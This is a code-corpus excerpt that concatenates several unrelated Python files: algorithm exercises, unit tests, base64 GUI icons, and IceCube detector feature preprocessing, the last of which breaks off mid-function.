| 1.921875 | 2 |
ch01/challenge.py | laszlokiraly/LearningAlgorithms | 0 | 16961 | """
Challenge Exercises for Chapter 1.
"""
import random
import timeit
from algs.table import DataTable, ExerciseNum, caption
from algs.counting import RecordedItem
def partition(A, lo, hi, idx):
    """
    Partition using A[idx] as value. Note lo and hi are INCLUSIVE on both
    ends and idx must be valid index. Count the number of comparisons
    by populating A with RecordedItem instances.

    Returns the final index of the pivot; values left of it are <= pivot,
    values right of it are >= pivot. Hoare-style two-pointer scheme.
    """
    if lo == hi:
        return lo

    A[idx],A[lo] = A[lo],A[idx]    # swap into position
    i = lo
    j = hi + 1
    while True:
        # Advance i rightward until an element larger than the pivot
        # (A[lo]) is found, or i reaches hi.
        while True:
            i += 1
            if i == hi: break
            if A[lo] < A[i]: break

        # Advance j leftward until an element smaller than the pivot is
        # found, or j reaches lo.
        while True:
            j -= 1
            if j == lo: break
            if A[j] < A[lo]: break

        # doesn't count as comparing two values
        if i >= j: break

        # Both pointers stopped on out-of-place elements: exchange them.
        A[i],A[j] = A[j],A[i]

    # Move the pivot from the front into its final slot j.
    A[lo],A[j] = A[j],A[lo]
    return j
def linear_median(A):
    """
    Efficient implementation that returns median value in arbitrary list,
    assuming A has an odd number of values. Note this algorithm will
    rearrange values in A.

    Randomized quickselect: repeatedly partition around a random pivot
    and recurse (iteratively) into the half containing the middle index.
    Expected linear time.
    """
    # if len(A) % 2 == 0:
    #     raise ValueError('linear_median() only coded to work with odd number of values.')
    lo = 0
    hi = len(A) - 1
    mid = hi // 2
    while lo < hi:
        idx = random.randint(lo, hi)     # select valid index randomly
        j = partition(A, lo, hi, idx)

        if j == mid:
            # Pivot landed exactly on the median position.
            return A[j]

        # Shrink the search window to the side that contains mid.
        if j < mid:
            lo = j+1
        else:
            hi = j-1
    return A[lo]
def median_from_sorted_list(A):
    """Return the median of A by sorting a copy; A itself is left untouched."""
    ordered = sorted(A)
    n = len(A)
    mid = n // 2
    if n % 2 == 0:
        # Even count: average the two middle values.
        return (ordered[mid - 1] + ordered[mid]) / 2
    return ordered[mid]
def counting_sort(A, M):
    """
    Update A in place to be sorted in ascending order if all elements
    are guaranteed to be in the range 0 to and not including M.
    """
    counts = [0] * M
    for value in A:
        counts[value] += 1

    # Write each value back counts[value] times, in ascending order.
    pos = 0
    for value in range(M):
        for offset in range(counts[value]):
            A[pos + offset] = value
        pos += counts[value]
def counting_sort_improved(A, M):
    """
    Update A in place to be sorted in ascending order if all elements
    are guaranteed to be in the range 0 to and not including M.
    """
    counts = [0] * M
    for value in A:
        counts[value] += 1

    pos = 0
    for value in range(M):
        run = counts[value]
        if run > 0:
            # Splice in a whole run of identical values with one assignment.
            A[pos:pos + run] = [value] * run
            pos += run
def run_counting_sort_trials(max_k=15, output=True):
    """Generate table for counting sort up to (but not including) max_k=15.

    Times counting_sort vs counting_sort_improved on shuffled lists of
    size 2^8 .. 2^(max_k-1); timings import the functions from the
    installed ch01.challenge module, not this in-memory copy.
    """
    tbl = DataTable([8,15,15],
                    ['N', 'counting_sort', 'counting_sort_improved'], output=output)

    M = 20   # arbitrary value, and results are dependent on this value.
    trials = [2**k for k in range(8, max_k)]
    for n in trials:
        # NOTE(review): w and b in the setup strings appear unused — confirm
        # they can be dropped from the timing setup.
        t_cs = min(timeit.repeat(stmt='counting_sort(a,{})\nis_sorted(a)'.format(M),
                                 setup='''
import random
from ch01.challenge import counting_sort
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
        t_csi = min(timeit.repeat(stmt='counting_sort_improved(a,{})\nis_sorted(a)'.format(M),
                                  setup='''
import random
from ch01.challenge import counting_sort_improved
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))

        tbl.row([n, t_cs, t_csi])
    return tbl
def run_median_trial():
    """Generate table for Median Trial.

    Compares linear_median (quickselect) against median_from_sorted_list
    on shuffled 0..n-1 lists of odd size 2^k + 1; reports milliseconds
    (min of 10 repeats, averaged over 5 runs each).
    """
    tbl = DataTable([10,15,15],['N', 'median_time', 'sort_median'])

    trials = [2**k+1 for k in range(8,20)]
    for n in trials:
        # The assert inside the timed statement doubles as a correctness
        # check: the median of shuffled range(n) is n//2.
        t_med = 1000*min(timeit.repeat(stmt='assert(linear_median(a) == {}//2)'.format(n),
                                       setup='''
import random
from ch01.challenge import linear_median
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5

        t_sort = 1000*min(timeit.repeat(stmt='assert(median_from_sorted_list(a) == {0}//2)'.format(n),
                                        setup='''
import random
from ch01.challenge import median_from_sorted_list
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5

        tbl.row([n, t_med, t_sort])
    return tbl
def run_median_less_than_trial(max_k=20, output=True):
    """Use RecordedItem to count # of times Less-than invoked up to (but not including) max_k=20.

    Wraps each value in a RecordedItem so that every '<' comparison is
    tallied, then compares the comparison counts of quickselect
    (linear_median) against sort-based median on the same shuffled list.
    """
    tbl = DataTable([10,15,15],['N', 'median_count', 'sort_median_count'], output=output)
    tbl.format('median_count', ',d')
    tbl.format('sort_median_count', ',d')
    trials = [2**k+1 for k in range(8, max_k)]
    for n in trials:
        A = list([RecordedItem(i) for i in range(n)])
        random.shuffle(A)
        # Generated external sorted to reuse list
        RecordedItem.clear()
        med2 = median_from_sorted_list(A)
        sort_lt = RecordedItem.report()[1]     # index 1 holds the '<' tally
        RecordedItem.clear()
        med1 = linear_median(A)
        lin_lt = RecordedItem.report()[1]
        # Both strategies must agree on the median value.
        assert med1 == med2
        tbl.row([n, lin_lt, sort_lt])
    return tbl
def is_palindrome1(w):
    """Compare w against its reversal, built with a negative-step slice."""
    reversed_w = w[::-1]
    return reversed_w == w
def is_palindrome2(w):
    """Repeatedly strip matching outer characters; a mismatch ends the search."""
    current = w
    while len(current) > 1:
        first, last = current[0], current[-1]
        if first != last:
            return False
        # Peel one character from each end and continue inward.
        current = current[1:-1]
    return True
def is_palindrome3(w):
    """Compare characters from both ends, without copying arrays."""
    # len(w) // 2 replaces round(len(w)/2): it avoids float arithmetic and
    # round()'s banker's rounding, and the middle character of an
    # odd-length string never needs checking anyway.
    for i in range(len(w) // 2):
        if w[i] != w[-(i + 1)]:
            return False
    return True  # must have been a Palindrome
def is_palindrome_letters_only(s):
    """
    Confirm Palindrome, even when string contains non-alphabet letters
    and ignore capitalization.

    Strings with no alphabetic characters are vacuously palindromes.
    casefold() method, which was introduced in Python 3.3, could be
    used instead of this older method, which converts to lower().
    """
    i = 0
    j = len(s) - 1
    while i < j:
        # Skip non-alphabetic characters from both ends. The `i < j`
        # guards fix a boundary bug in the original: when one side ran out
        # of letters, the breaks fell through and punctuation characters
        # were compared (e.g. '.,' wrongly returned False).
        while i < j and not s[i].isalpha():
            i += 1
        while i < j and not s[j].isalpha():
            j -= 1
        if i < j:
            if s[i].lower() != s[j].lower():
                return False
            i += 1
            j -= 1
    return True
def tournament_allows_odd(A):
    """
    Returns two largest values in A. Works for odd lists

    Runs a single-elimination tournament of Match objects; the runner-up
    must be one of the values the eventual champion beat, so it is found
    by walking the champion's chain of prior matches.
    """
    from ch01.largest_two import Match
    if len(A) < 2:
        raise ValueError('Must have at least two values')

    # First round: pair up adjacent values.
    tourn = []
    for i in range(0, len(A)-1, 2):
        tourn.append(Match(A[i], A[i+1]))

    # With an odd count, the last value sits out the tournament entirely.
    odd_one_out = None
    if len(A) % 2 == 1:
        odd_one_out = A[-1]

    # Play matches until a single champion match remains.
    while len(tourn) > 1:
        tourn.append(Match.advance(tourn[0], tourn[1]))
        del tourn[0:2]

    # Find where second is hiding!
    m = tourn[0]
    largest = m.larger
    second = m.smaller

    # Wait until the end, and see where it belongs
    # NOTE(review): `if odd_one_out:` is a truthiness test, so an odd
    # element equal to 0 (or otherwise falsy) is silently ignored —
    # `if odd_one_out is not None:` looks intended; confirm.
    if odd_one_out:
        if odd_one_out > largest:
            largest,second = odd_one_out,largest
        elif odd_one_out > second:
            second = odd_one_out

    # The true runner-up is the best value the champion ever eliminated.
    while m.prior:
        m = m.prior
        if second < m.smaller:
            second = m.smaller

    return (largest,second)
def two_largest_attempt(A):
    """Failed attempt to implement two largest.

    Deliberately flawed teaching example: it compares only the maxima of
    the two halves, so it misses the runner-up whenever the two largest
    values sit in the same half.
    """
    mid = len(A) // 2
    left_max = max(A[:mid])
    right_max = max(A[mid:])
    if left_max < right_max:
        return (right_max, left_max)
    return (left_max, right_max)
#######################################################################
# Driver: runs each chapter-1 challenge exercise in turn when executed
# directly (python -m ch01.challenge). Produces tables and demo output.
if __name__ == '__main__':
    chapter = 1
    with ExerciseNum(1) as exercise_number:
        sample = 'A man, a plan, a canal. Panama!'
        print(sample,'is a palindrome:', is_palindrome_letters_only(sample))
        print(caption(chapter, exercise_number),
              'Palindrome Detector')
    with ExerciseNum(2) as exercise_number:
        run_median_less_than_trial()
        print()
        run_median_trial()
        print(caption(chapter, exercise_number),
              'Median Counting')
    with ExerciseNum(3) as exercise_number:
        run_counting_sort_trials()
        print(caption(chapter, exercise_number),
              'Counting Sort Trials')
    with ExerciseNum(4) as exercise_number:
        print('see tournament_allows_odd in ch01.challenge')
        print(caption(chapter, exercise_number),
              'Odd tournament')
    with ExerciseNum(5) as exercise_number:
        # Demonstrates why the half-split approach is wrong.
        print('Should print (9, 8)', two_largest_attempt([9, 3, 5, 7, 8, 1]))
        print('Fails to print (9, 8)', two_largest_attempt([9, 8, 5, 7, 3, 1]))
        print(caption(chapter, exercise_number),
              'Failed Two largest')
| 3.671875 | 4 |
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py | mace84/script-languages | 0 | 16962 | from typing import Dict
from exaslct_src.lib.data.image_info import ImageInfo
from exaslct_src.lib.data.dependency_collector.dependency_collector import DependencyInfoCollector
class DependencyImageInfoCollector(DependencyInfoCollector[ImageInfo]):
    """Collects ImageInfo dependency data from task inputs keyed by IMAGE_INFO."""

    def is_info(self, input):
        # An input qualifies when it is a dict carrying the image-info entry.
        return isinstance(input, Dict) and IMAGE_INFO in input

    def read_info(self, value) -> ImageInfo:
        # The IMAGE_INFO entry is an openable target holding ImageInfo JSON.
        with value[IMAGE_INFO].open("r") as json_file:
            return ImageInfo.from_json(json_file.read())
IMAGE_INFO = "image_info"
| 2.5625 | 3 |
tensorflow_transform/test_case_test.py | LaudateCorpus1/transform | 970 | 16963 | <gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_transform.test_case."""
import re
from tensorflow_transform import test_case
import unittest
class TftUnitTest(test_case.TransformTestCase):
  """Unit tests for the helpers in tensorflow_transform.test_case."""

  def testCrossNamedParameters(self):
    # Cross product of named test cases must concatenate testcase_names
    # and merge the parameter dicts.
    test_cases_1 = [
        {'testcase_name': 'a_1_b_1', 'a': 1, 'b': 1},
        {'testcase_name': 'a_3_b_3', 'a': 3, 'b': 3},
    ]
    test_cases_2 = [
        {'testcase_name': 'c_2', 'c': 2},
        {'testcase_name': 'c_4', 'c': 4},
    ]
    expected_cross = [
        {'testcase_name': 'a_1_b_1_c_2', 'a': 1, 'b': 1, 'c': 2},
        {'testcase_name': 'a_1_b_1_c_4', 'a': 1, 'b': 1, 'c': 4},
        {'testcase_name': 'a_3_b_3_c_2', 'a': 3, 'b': 3, 'c': 2},
        {'testcase_name': 'a_3_b_3_c_4', 'a': 3, 'b': 3, 'c': 4},
    ]
    self.assertEqual(
        test_case.cross_named_parameters(test_cases_1, test_cases_2),
        expected_cross)

  def testCrossParameters(self):
    test_cases_1 = [('a', 1), ('b', 2)]
    test_cases_2 = [(True,), (False,)]
    expected_cross = [
        ('a', 1, True), ('b', 2, True),
        ('a', 1, False), ('b', 2, False),
    ]
    self.assertCountEqual(
        test_case.cross_parameters(test_cases_1, test_cases_2), expected_cross)

  def testAssertDataCloseOrEqual(self):
    # Values within float tolerance compare as equal.
    self.assertDataCloseOrEqual([{'a': 'first',
                                  'b': 1.0,
                                  'c': 5,
                                  'd': ('second', 2.0)},
                                 {'e': 2,
                                  'f': 3}],
                                [{'a': 'first',
                                  'b': 1.0000001,
                                  'c': 5,
                                  'd': ('second', 2.0000001)},
                                 {'e': 2,
                                  'f': 3}])
    # assertRaisesRegex replaces the deprecated assertRaisesRegexp alias,
    # which was removed in Python 3.12.
    with self.assertRaisesRegex(AssertionError, r'len\(.*\) != len\(\[\]\)'):
      self.assertDataCloseOrEqual([{'a': 1}], [])
    with self.assertRaisesRegex(
        AssertionError,
        re.compile('Element counts were not equal.*: Row 0', re.DOTALL)):
      self.assertDataCloseOrEqual([{'a': 1}], [{'b': 1}])
    with self.assertRaisesRegex(
        AssertionError,
        re.compile('Not equal to tolerance.*: Row 0, key a', re.DOTALL)):
      self.assertDataCloseOrEqual([{'a': 1}], [{'a': 2}])

  @test_case.parameters((1, 'a'), (2, 'b'))
  def testSampleParametrizedTestMethod(self, my_arg, my_other_arg):
    self.assertIn((my_arg, my_other_arg), {(1, 'a'), (2, 'b')})
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
  unittest.main()
| 2.15625 | 2 |
metageta/icons.py | ssutee/metageta | 0 | 16964 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
base 64 encoded gif images for the GUI buttons
'''
class app_img:
    """Base64-encoded GIF icon used by the GUI (see module docstring)."""
    # Image format of the decoded payload below.
    format='gif'
    # Base64-encoded image bytes; decode with base64.b64decode before use.
    data='''R0lGODlhEAAQAOeRACcLIiAbCSAjCjMdMzsfMjUkGUcmRjwwJ0YqRj4xJVwoUFguRkU2MS0/LzQ8
PC8/LzM+QTJCMDJCQTpCQCxIME1CIXQyYW48KTpLO1REPEpKSktKS01KSkpLSkxLTE1LS0VNUDtS
PD9PT0tMTExMTE1MTUxNTU1NTU5NTUFUQFFOTkZRU1BPTU9QUUVTVF9PO1JUVVRVSnlNM0VeRlZX
W1ZYVVZYWF5XVFBdUkpfX2RZXIZMgVtdX11eX1tfW1xfW1tfXqZEkFtgW2NfYWZgW2tdal9iXk9m
Z19iYk9pTqZIn5lNlU1rTp1XOF9lZVxnXF5oXlNrZ59eM1FzU1dyVcVItJJmSl5ycq1Wp1t0cLlU
tWB1eF52dmKBY12DX9RWwGN/f+RSzaVzTdNbxmaEhLlzRdFhs2WJZWeJZmOMZ7Z2UXGGhm2IiGqJ
iKV+VmuKimyKi26Ojm2ScnGQkGuWb22Wb3OTk+xp2+dr5eF73Pl154SfoMKYeIampoimptiYbPuB
8viD8I2sq/KJ7pOtrZGuruebbpGvr/+I/Ja1tdqrf9i3i/iweviwhP+zhf/Hif/Lpf//////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////yH5BAEKAP8ALAAAAAAQABAA
AAjRAP8JHEiwoMGBGk6MOChQgwYgEnJwcdGjoAYbIo5EyQIGjh02axyYIOjkSqI4bci8mdPnECEk
Ggi2WFHIj6A9WyDQgEFiYIcfKR5MAMHDhJAQTCLUIGgEQ5cZDZKgqUMnDRUfMQVu8ADFi5wzUyjg
KLEh6z8PCAZhGfIEBQALZgAtMUCwyI48Y6roQRToThglAzYMZEFkgRY8X4Io0CEgBkENByDxYUAg
QAU3jB6JKUBQxYtFigw5avSnjBQZN8wKTGBFTZMLGRwy/Mfhg2qCAQEAOw=='''
class shp_img:
    """Base64-encoded GIF icon used by the GUI (see module docstring)."""
    # Image format of the decoded payload below.
    format='gif'
    data='''R0lGODlhEAAQAMIFABAQEIBnII+HgLS0pfDwsC8gIC8gIC8gICH5BAEKAAcALAAAAAAQABAAAAND
eLrcJzBKqcQIN+MtwAvTNHTPSJwoQAigxwpouo4urZ7364I4cM8kC0x20n2GRGEtJGl9NFBMkBny
HHzYrNbB7XoXCQA7'''
class dir_img:
    """Base64-encoded GIF icon used by the GUI (see module docstring)."""
    # Fixed: the original had a trailing comma (format='gif',) which made
    # `format` the 1-tuple ('gif',), inconsistent with every sibling icon
    # class that exposes it as a plain string.
    format='gif'
    data='''R0lGODlhEAAQAMZUABAQEB8QEB8YEC8gIC8vIEA4ME9IQF9IIFpTSWBXQHBfUFBoj3NlRoBnII9v
IIBwUGB3kH93YIZ5UZ94IJB/YIqAcLB/EI+IcICHn4+HgMCHEI6Oe4CPn4+PgMCQANCHEJ+PgICX
r9CQANCQEJ+XgJKanaCgkK+fgJykoaKjo7CgkKimk+CfIKKoo6uoleCgMLCnkNCnUKuwpLSvkrSv
mfCoMLWyn7+wkM+vcLS0pfCwML+4kPC3QNDAgM+/kPDAQP+/UODIgP/IUODQoP/QUPDQgP/QYP/P
cPDYgP/XYP/XcP/YgPDgkP/ggP/gkPDnoP/noPDwoPDwsP/woP//////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////yH5
BAEKAH8ALAAAAAAQABAAAAe1gH+Cg4SFhoQyHBghKIeEECV/ORwtEDYwmJg0hikLCzBDUlJTUCoz
hZ4LKlGjUFBKJiQkIB0XgypPpFBLSb2+toImT643N5gnJ7IgIBkXJExQQTBN1NVNSkoxFc9OMDtK
vkZEQjwvDC4gSNJNR0lGRkI/PDoNEn8gRTA+Su9CQPM1PhxY8SdDj2nw4umowWJEAwSCLqjAIaKi
Bw0WLExwcGBDRAoRHihIYKAAgQECAARwxFJQIAA7'''
class xls_img:
    """Base64-encoded GIF icon used by the GUI (see module docstring)."""
    # Image format of the decoded payload below.
    format='gif'
    data='''R0lGODlhEAAQAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/
/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm
AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/
MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm
ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/
mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm
zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/
/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ
AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA
M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ
ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A
mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z
zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///ywAAAAAEAAQAAAIngBfuUKF
ipBBg4MS9umTJYsrBAheSZwokGBBhwgeaNzIUSOhLKgydhz5EdWrB4oOelT5kdDJLwgUKRpEKOUX
Gtpannzw5ZVNQje15czicmNPg1lwCtW5EeirQV+IEtI2iOjOmh9dQc2SimqWQa4efGzYcGZUr4NQ
ddSWimwWr33UahRKly61qn0Iza1rl9qXKVIPIkyY8Mtft4gTTwkIADs='''
class xsl_img:
    """Base64-encoded GIF icon used by the GUI (see module docstring)."""
    # Image format of the decoded payload below.
    format='gif'
    data='''R0lGODdhEAAQAOMPAAAAAAAAgAAAmQAA/zNmmQCAgDNm/zOZAIaGhjOZ/zPM/8DAwKbK8DP///Hx
8f///ywBAAAADwAQAAAEWBDJSeW76Or9Vn4f5zzOAp5kOo5AC2QOMxaFQcrP+zDCUzyNROAhkL14
pEJDcQiMijqkIXEYDIsOXWwU6N5Yn5VKpSWYz2fwRcwmldFo9bidhc3Hrrw+HwEAOw=='''
class log_img:
    """Base64-encoded GIF icon used by the GUI (see module docstring)."""
    # Image format of the decoded payload below.
    format='gif'
    data='''R0lGODlhEAAQAIQQAG9s0oJ5eatyP6tycpePj6ulP6ulctWeOaulpdWentXSOcvHx9XS0v/MzP//
zP///y8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gICH5BAEK
ABAALAAAAAAQABAAAAViICSOUNMwjEOOhyIUyhAbzMoAgJAQi9EjtRGAIXgUjw9CUDR8OJ9OJakJ
fUqFjCSBZ11CqNWkt7ndLqLjbFg8zZa5bOw6znSfoVfm3clYIP5eEH4EAQFlCAsrEH2ICygoJCEA
Ow=='''
| 1.367188 | 1 |
chmp/src/chmp/torch_utils/_test_bayes.py | chmp/misc-exp | 6 | 16965 | import torch
import pytest
# NOTE: also registers the KL divergence
from chmp.torch_utils import NormalModule, WeightsHS, fixed
def test_kl_divergence__gamma__log_normal():
    # Exercises the LogNormal -> Gamma KL divergence registered as a side
    # effect of importing chmp.torch_utils (see module-level NOTE).
    log_normal = torch.distributions.LogNormal(torch.zeros(2), torch.ones(2))
    gamma = torch.distributions.Gamma(torch.ones(2), torch.ones(2))

    torch.distributions.kl_divergence(log_normal, gamma)
def test__module_parameters():
    """Only non-fixed tensors should be registered as learnable parameters."""

    def parameter_names(module):
        return {name for name, _ in module.named_parameters()}

    # A fixed scale must be excluded from the parameter list.
    assert parameter_names(NormalModule(loc=torch.zeros(1), scale=fixed(torch.ones(1)))) == {"loc"}

    # Plain tensors are both registered as parameters.
    assert parameter_names(NormalModule(loc=torch.zeros(1), scale=torch.ones(1))) == {"loc", "scale"}

    # Positional loc behaves exactly like the keyword form.
    assert parameter_names(NormalModule(torch.zeros(1), scale=fixed(torch.ones(1)))) == {"loc"}
def test__module_fixed_parameters_optimize():
    """Training must move the free loc while leaving the fixed scale untouched."""
    dist = NormalModule(torch.zeros(1), fixed(torch.ones(1)))
    opt = torch.optim.Adam(dist.parameters(), lr=0.1)

    for _step in range(100):
        opt.zero_grad()
        samples = dist.rsample((20,))
        objective = ((samples - 2.0) ** 2.0).mean()
        objective.backward()
        opt.step()

    # loc is trainable and should have drifted away from its initial value.
    assert float(dist.loc) != pytest.approx(0.0)
    # scale was wrapped in fixed(...) and must not have been updated.
    assert float(dist.scale) == pytest.approx(1.0)
def test_weight_hs_api():
    """Basic API contract of the horseshoe weight prior."""
    requested_shape = [10, 20, 30]
    weights = WeightsHS(requested_shape, tau_0=1e-5)

    # Sampling the weights yields a tensor with the requested shape ...
    assert weights().shape == (10, 20, 30)
    # ... and the KL divergence is a scalar.
    assert weights.kl_divergence().shape == ()
| 2.203125 | 2 |
test/hummingbot/core/utils/test_fixed_rate_source.py | BGTCapital/hummingbot | 3,027 | 16966 | <filename>test/hummingbot/core/utils/test_fixed_rate_source.py
from decimal import Decimal
from unittest import TestCase
from hummingbot.core.utils.fixed_rate_source import FixedRateSource
class FixedRateSourceTests(TestCase):
    """Unit tests for the FixedRateSource conversion-rate provider."""

    def setUp(self):
        super().setUp()
        self.rate_source = FixedRateSource()

    def test_look_for_unconfigured_pair_rate(self):
        # No rate was registered, so the lookup yields None.
        self.assertIsNone(self.rate_source.rate("BTC-USDT"))

    def test_get_rate(self):
        self.rate_source.add_rate("BTC-USDT", Decimal(40000))

        self.assertEqual(Decimal(40000), self.rate_source.rate("BTC-USDT"))

    def test_get_rate_when_inverted_pair_is_configured(self):
        self.rate_source.add_rate("BTC-USDT", Decimal(40000))

        # Asking for the reversed pair returns the reciprocal rate.
        self.assertEqual(Decimal(1) / Decimal(40000), self.rate_source.rate("USDT-BTC"))

    def test_string_representation(self):
        self.assertEqual("fixed rates", str(FixedRateSource()))
| 2.796875 | 3 |
src/graphnet/models/detector/icecube.py | kaareendrup/gnn-reco | 0 | 16967 | import torch
from torch_geometric.data import Data
from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute
from graphnet.data.constants import FEATURES
from graphnet.models.detector.detector import Detector
class IceCube86(Detector):
    """`Detector` class for IceCube-86."""

    # Implementing abstract class attribute
    features = FEATURES.ICECUBE86

    def _forward(self, data: Data) -> Data:
        """Ingests data, builds graph (connectivity/adjacency), and preprocesses features.

        Args:
            data (Data): Input graph data.

        Returns:
            Data: Connected and preprocessed graph data.
        """
        # Check(s)
        self._validate_features(data)

        # Preprocessing: in-place shift/scale of each feature column so the
        # network sees roughly unit-scale inputs. The constants are presumably
        # empirical normalizers for IceCube-86 — TODO confirm against training data.
        data.x[:,0] /= 100.  # dom_x
        data.x[:,1] /= 100.  # dom_y
        data.x[:,2] += 350.  # dom_z
        data.x[:,2] /= 100.
        data.x[:,3] /= 1.05e+04  # dom_time
        data.x[:,3] -= 1.
        data.x[:,3] *= 20.
        data.x[:,4] /= 1.  # charge (no-op scaling, kept for symmetry)
        data.x[:,5] -= 1.25  # rde
        data.x[:,5] /= 0.25
        data.x[:,6] /= 0.05  # pmt_area

        return data
class IceCubeDeepCore(IceCube86):
    """`Detector` class for IceCube-DeepCore."""
    # Inherits `features` and the `_forward` preprocessing unchanged from IceCube86.
class IceCubeUpgrade(IceCubeDeepCore):
    """`Detector` class for IceCube-Upgrade."""

    # Implementing abstract class attribute
    features = FEATURES.UPGRADE

    def _forward(self, data: Data) -> Data:
        """Ingests data, builds graph (connectivity/adjacency), and preprocesses features.

        Args:
            data (Data): Input graph data.

        Returns:
            Data: Connected and preprocessed graph data.
        """
        # Check(s)
        self._validate_features(data)

        # Preprocessing: in-place shift/scale per feature column; constants are
        # presumably empirical normalizers for the Upgrade geometry — TODO confirm.
        # Columns commented out (rde, pmt_dir_*) are intentionally left unscaled.
        data.x[:,0] /= 500.  # dom_x
        data.x[:,1] /= 500.  # dom_y
        data.x[:,2] /= 500.  # dom_z
        data.x[:,3] /= 2e+04  # dom_time
        data.x[:,3] -= 1.
        data.x[:,4] = torch.log10(data.x[:,4]) / 2.  # charge
        #data.x[:,5] /= 1.  # rde
        data.x[:,6] /= 0.05  # pmt_area
        data.x[:,7] -= 50.  # string
        data.x[:,7] /= 50.
        data.x[:,8] /= 20.  # pmt_number
        data.x[:,9] -= 60.  # dom_number
        data.x[:,9] /= 60.
        #data.x[:,10] /= 1.  # pmt_dir_x
        #data.x[:,11] /= 1.  # pmt_dir_y
        #data.x[:,12] /= 1.  # pmt_dir_z
        data.x[:,13] /= 130.  # dom_type

        return data
class IceCubeUpgrade_V2(IceCubeDeepCore):
    """`Detector` class for IceCube-Upgrade with engineered PMT/COG features."""

    # Implementing abstract class attribute
    features = FEATURES.UPGRADE

    @property
    def nb_outputs(self):
        # Three engineered feature columns are appended in `_forward` below.
        return self.nb_inputs + 3

    def _forward(self, data: Data) -> Data:
        """Ingests data, builds graph (connectivity/adjacency), and preprocesses features.

        Args:
            data (Data): Input graph data.

        Returns:
            Data: Connected and preprocessed graph data, with three extra
                feature columns appended: photoelectrons per PMT, distance to
                the charge center of gravity, and the cosine of the angle
                between the PMT direction and that center of gravity.
        """
        # Check(s)
        self._validate_features(data)

        # Assign pulse cluster indices to DOMs and PMTs, respectively
        data = group_pulses_to_dom(data)
        data = group_pulses_to_pmt(data)

        # Feature engineering inspired by Linea Hedemark and Tetiana Kozynets.
        xyz = torch.stack((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)
        # BUGFIX: the x-component was previously stacked three times
        # (pmt_dir_x, pmt_dir_x, pmt_dir_x), so the PMT direction vector was
        # wrong and the cosine feature below was meaningless.
